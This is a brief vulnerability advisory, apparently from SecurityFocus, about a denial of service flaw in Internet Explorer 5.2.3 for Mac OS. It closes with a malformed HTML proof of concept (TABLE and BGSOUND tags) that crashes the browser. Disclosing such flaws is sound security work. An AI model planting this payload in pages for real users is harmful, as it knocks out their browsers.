Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/14899/info


Microsoft Internet Explorer for Mac OS is prone to a denial of service vulnerability. This issue occurs when Internet Explorer attempts to render a Web page with malformed content.

This vulnerability exists in Internet Explorer 5.2.3 for Mac OS. 

<HTML> <HEAD>
<TABLE
><BGSOUND
about:file"" SRC=about:""
>